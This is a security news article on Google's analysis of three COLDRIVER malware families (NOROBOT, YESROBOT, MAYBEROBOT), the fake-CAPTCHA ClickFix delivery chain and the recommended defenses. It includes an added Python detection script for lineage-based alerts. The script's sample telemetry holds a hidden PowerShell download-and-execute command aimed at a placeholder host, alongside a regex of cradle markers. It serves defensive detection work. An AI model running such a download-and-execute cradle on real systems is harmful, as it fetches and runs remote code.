Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers
In late October 2025, Google Threat Intelligence Group (GTIG) published a detailed analysis of a rapidly evolving malware campaign tied to the Russian state-aligned hacking group known as COLDRIVER, also tracked under aliases including Star Blizzard, Callisto, and UNC4057. The disclosure covers three new malware families attributed to the group, and it highlights not only their adaptive technical development but also the accelerating pace of Russian cyber espionage operations targeting high-value individuals and organizations. Google Cloud
The identified malware, NOROBOT, YESROBOT, and MAYBEROBOT, represents a shift in the group's tactics, moving from simpler credential theft and phishing campaigns toward backdoor tooling designed for persistent access, command execution, and ongoing intelligence collection. The discovery underscores both the resilience and the development tempo of COLDRIVER's operations: the group retooled within five days of the public disclosure of its previous LOSTKEYS malware and then kept iterating. Google Cloud
Who Is COLDRIVER? A Persistent Russian Cyber Threat
Before examining the new malware families, it’s essential to understand the group behind them.
COLDRIVER is a Russia-linked advanced persistent threat (APT) group that has been active for years conducting espionage, credential harvesting, and targeted attacks. Western governments and private-sector threat analysts attribute the group to Russian intelligence, specifically the Federal Security Service (FSB). The group's past campaigns have focused on high-profile individuals, including non-governmental organization (NGO) advisors, policy advisors, dissidents, and diplomats, especially those connected to NATO countries, Ukraine, and Western policy circles. The Record from Recorded Future
Historically, COLDRIVER's operations relied heavily on phishing and credential theft. Its first publicly documented implant, LOSTKEYS, was disclosed in May 2025 as a file-stealing tool delivered via ClickFix-style lures: a fake CAPTCHA page instructs the victim to paste and run a command that has been placed on their clipboard, which launches PowerShell to download and execute further scripts, allowing the attackers to exfiltrate files and system information. Cyware
Following the public exposure of LOSTKEYS in May 2025, the group demonstrated considerable agility: it retired the exposed tool and quickly rolled out a new suite of malware families with more capable and stealthier components. Google Cloud
The Three New Malware Families: NOROBOT, YESROBOT, and MAYBEROBOT
1. NOROBOT: The Sophisticated Loader DLL
The first component in the new malware chain is NOROBOT — a malicious Dynamic Link Library (DLL) that functions as a downloader and loader for subsequent payloads. Unlike earlier scripts that relied on multi‑stage PowerShell, NOROBOT is delivered via a DLL executed through rundll32, often after a user is tricked into visiting a page disguised as a CAPTCHA check.
In many cases, COLDRIVER’s delivery mechanism starts with a lure called COLDCOPY “ClickFix”, which uses social engineering text such as “I am not a robot” to convince a user to download and run NOROBOT. The DLL then contacts hard‑coded command‑and‑control (C2) servers to retrieve and prepare the next stage payload. Google Cloud
NOROBOT itself has undergone extensive evolution since its discovery, with variants that initially incorporated split cryptography keys to hamper analysis and later simplified versions designed for ease of deployment and evasion. Earlier versions even fetched and installed a full Python runtime to support the next stage — a noisy indicator that was later abandoned as the toolchain became cleaner and stealthier. Google Cloud
2. YESROBOT: A Python‑Based Interim Backdoor
The earliest payload that NOROBOT delivered was YESROBOT, a Python-based backdoor. While it enabled remote command execution, YESROBOT proved cumbersome both to deploy and to keep hidden, because it required a full Python 3.8 installation on the victim host, a footprint that greatly increased its visibility to defenders. That made it a poor fit for prolonged, covert operations. Google Cloud
YESROBOT's functionality was limited to remote execution and basic control, and it was used only briefly before being replaced. In hindsight it reads as an interim stage in the group's move toward a lighter backdoor that needs no bundled runtime. Google Cloud
3. MAYBEROBOT: A Flexible PowerShell Backdoor
By early June 2025, COLDRIVER began deploying MAYBEROBOT instead of YESROBOT. This new backdoor — also tracked by some vendors as SIMPLEFIX — was written in PowerShell and provided a lightweight yet extensible command‑and‑control interface. MAYBEROBOT offers three primary capabilities:
- Download and execute files from a specified URL.
- Execute arbitrary commands via cmd.exe.
- Execute specified PowerShell blocks.
Communication with C2 infrastructure involves acknowledgments and, where appropriate, the output of executed commands. Google Cloud
This design makes it easy to extend functionality through commands issued from the C2 server while keeping the on-host footprint small and less likely to trigger signature-based detection. Because PowerShell is a standard administrative tool on Windows, MAYBEROBOT's activity blends into normal system operations, which makes it harder to separate malicious execution from legitimate administration. The practical counter is telemetry rather than signatures: PowerShell script block logging (Event ID 4104), Antimalware Scan Interface (AMSI) inspection, and process-lineage monitoring all expose a download-and-execute stage regardless of how the script text is obfuscated. SC Media
Delivery Mechanisms: ClickFix and Rundll32
Across the new malware families, COLDRIVER continued to use social engineering lures that draw victims into executing malicious DLL files. The ClickFix style lure typically presents a fake CAPTCHA prompt, claiming the user must verify they are human before proceeding — a common tactic designed to bypass suspicion.
Once a user interacts with the lure, the malware leverages Windows’ rundll32.exe process to load NOROBOT, which then pulls down further stages like MAYBEROBOT from C2 servers. This approach mirrors past campaigns where malicious content was disguised behind seemingly innocuous frontends, but the technical implementation now combines DLL loading and obfuscated backdoor scripting to evade detection. Google Cloud
The deliberate use of a compiled DLL, rather than a script, complicates analysis: the malicious logic must be disassembled instead of simply read, the binary is invoked through a legitimate signed Windows tool (rundll32.exe), and a loader that fetches its payload at runtime leaves little of the backdoor on disk for forensic recovery. The layered approach, with NOROBOT acting as a downloader and the other families carrying the backdoor logic, also makes the toolchain modular, so that exposing or blocking one stage does not necessarily burn the others. Securonix
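The two preceding passages describe a chain that is easier to detect by process lineage than by file signatures: a user-facing process (browser or the Explorer Run dialog) starts rundll32.exe with a DLL from a user-writable path, that rundll32 spawns PowerShell running a download-and-execute stage, and the PowerShell backdoor in turn spawns cmd.exe. The following is an added example, not code from GTIG, Google, or the report it summarizes. It runs three lineage rules over constructed Sysmon Event ID 1 style process-creation records; the DLL file name, hostnames, and PIDs are invented, and the PowerShell "cradle" markers are generic download-and-execute patterns rather than MAYBEROBOT's published command syntax, which the page does not give.

```python
"""Added example: lineage-based detection for a ClickFix -> rundll32 -> PowerShell chain.

Assumptions (not from the original article): the record fields mirror Sysmon
Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine); the sample events
below are constructed, and the DLL name and URL in them are invented.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Paths a lure can write to without elevation; legitimate rundll32 use almost
# always loads DLLs from System32 or Program Files instead.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Downloads|AppData|Desktop)\\|\\Windows\\Temp\\"
    r"|\\ProgramData\\|\\Users\\Public\\",
    re.I,
)
# Processes that launch whatever a user clicked or pasted (browsers, Run dialog).
USER_FACING = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe"}
# Generic download-and-execute markers (assumption: not MAYBEROBOT's exact syntax).
CRADLE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
    r"|Invoke-Expression|\biex\b|-e(?:nc|ncodedcommand)?\b",
    re.I,
)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(p: Proc, by_pid: Dict[int, Proc]) -> Iterator[Proc]:
    """Walk the parent chain; the seen-set guards against PID reuse loops."""
    seen = {p.pid}
    while p.ppid in by_pid and p.ppid not in seen:
        p = by_pid[p.ppid]
        seen.add(p.pid)
        yield p


def descends_from(p: Proc, by_pid: Dict[int, Proc], name: str) -> bool:
    return any(basename(a.image) == name for a in ancestors(p, by_pid))


def detect(events: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that matches a chain rule."""
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[str, int]] = []
    for p in events:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""
        # Rule 1: rundll32 started by a user-facing process with a DLL from a user path.
        if name == "rundll32.exe" and pname in USER_FACING and USER_WRITABLE.search(p.cmdline):
            hits.append(("rundll32_user_dll_from_lure", p.pid))
        # Rule 2: PowerShell running a download/decode cradle; high if under rundll32.
        elif name in ("powershell.exe", "pwsh.exe") and CRADLE.search(p.cmdline):
            sev = "high" if descends_from(p, by_pid, "rundll32.exe") else "medium"
            hits.append((f"powershell_cradle_{sev}", p.pid))
        # Rule 3: cmd.exe spawned inside a rundll32 -> PowerShell lineage (backdoor command).
        elif (name == "cmd.exe" and descends_from(p, by_pid, "rundll32.exe")
              and descends_from(p, by_pid, "powershell.exe")):
            hits.append(("cmd_under_rundll32_powershell_chain", p.pid))
    return hits


# Constructed sample telemetry (invented PIDs, DLL name and URL).
SAMPLE_EVENTS = [
    Proc(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(200, 100, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    Proc(300, 100, r"C:\Windows\System32\rundll32.exe",
         r'rundll32.exe "C:\Users\alice\Downloads\captcha_check.dll",#1'),
    Proc(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
         ".DownloadString('https://example.invalid/stage')\""),
    Proc(500, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    Proc(600, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    Proc(700, 600, r"C:\Windows\System32\rundll32.exe",          # benign: system DLL
         r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    Proc(800, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -NoProfile -Command Get-ChildItem"),   # benign admin use
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

On the sample data only the three events in the lure chain (PIDs 300, 400, 500) fire; the system-DLL rundll32 and the interactive PowerShell session do not. In production the same rules would read from a SIEM or EDR process table, and Rule 1 in particular is worth tuning against the organization's own baseline of rundll32 parents.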
Operational Tempo and Evolutionary Dynamics
One of the striking insights from Google’s report is how rapidly COLDRIVER responded to public exposure of its previous malware. Within just five days of the disclosure of LOSTKEYS in May 2025, the group had already begun deploying NOROBOT and the associated robotic‑themed malware families. Google Cloud
Security researchers have noted that COLDRIVER’s development tempo — the speed at which it iterated and evolved its malware — has increased compared to prior campaigns. NOROBOT, YESROBOT, and MAYBEROBOT underwent multiple revisions between June and September 2025, with each iteration balancing stealth, flexibility, and ease of deployment. Securonix
This dynamic evolution illustrates a broader trend among state‑aligned threat actors: when one tool is exposed, they do not simply abandon operations but instead pivot quickly to new serviceable tools, often with improved capabilities and evasion techniques. The Hacker News
Targets and Strategic Implications
COLDRIVER’s attack campaigns have historically focused on individuals and organizations of strategic interest to Russia, including:
- Government and military personnel.
- Policy advisors and think tanks in NATO countries.
- Non-governmental organizations (NGOs) dealing with democracy, human rights, and geopolitical affairs.
- Journalists and civil society actors advocating against Russian state narratives. The Record from Recorded Future
The shift toward custom backdoor malware, and away from credential phishing alone, indicates an increased emphasis on persistent, interactive access to a victim's machine, with the ability to run arbitrary commands and exfiltrate data over time rather than harvesting a single set of credentials.
The ROBOT-themed names (NOROBOT, YESROBOT, MAYBEROBOT) are GTIG's tracking names rather than names chosen by the actor; they echo the "I am not a robot" text of the CAPTCHA lure that starts the chain. Each family plays a distinct role in establishing and maintaining covert access within compromised environments, supporting long-term espionage. LinkedIn
Detection, Mitigation, and Defense Measures
In response to these developments, Google incorporated IOCs (indicators of compromise) and behavior‑based detection logic into Safe Browsing and anti‑malware protections across its products, including Chrome and Gmail. Targeted alerts were also sent to high‑risk users through government‑backed attacker warnings to encourage enhanced browsing protections and up‑to‑date system hygiene. Google Cloud
Proactive Defense Strategies
To defend against this evolving threat landscape, organizations should consider:
- Enhanced email security to block phishing and social engineering lures.
- Endpoint detection and response (EDR) tools to monitor for suspicious DLL loading and PowerShell execution.
- Network intrusion detection systems (NIDS) configured to spot unusual C2 traffic patterns.
- Multi-factor authentication (MFA) to limit credential misuse even if initial compromise occurs.
- User awareness training focused on deceptive lures like fake CAPTCHA prompts.
Threat Intelligence Sharing
Security teams should also leverage shared threat intelligence feeds that include IOCs and malicious domain lists as published by Google and the broader research community. Rapid sharing among defenders can help contain emerging campaigns much earlier in their lifecycle. NetmanageIT CTO Corner
Looking Ahead: Cyber Espionage in 2026 and Beyond
The rapid emergence of three new malware families within months of exposing an older strain suggests that COLDRIVER — and likely other state‑aligned groups — is doubling down on flexible malware development and adaptive delivery techniques designed to evade detection while maximizing operational persistence.
This incident also reinforces the importance of industry transparency and collaboration. Public disclosures by major technology firms like Google raise the bar for defensive readiness and give defenders visibility into threat actor capabilities before the tools are deployed more widely. Securonix
As geopolitical tensions continue to drive cyber espionage activities, organizations in sensitive sectors — including government, defense, civil society, and think tanks — must remain vigilant, prioritizing both technical defenses and human‑centric safeguards to withstand increasingly agile malware campaigns.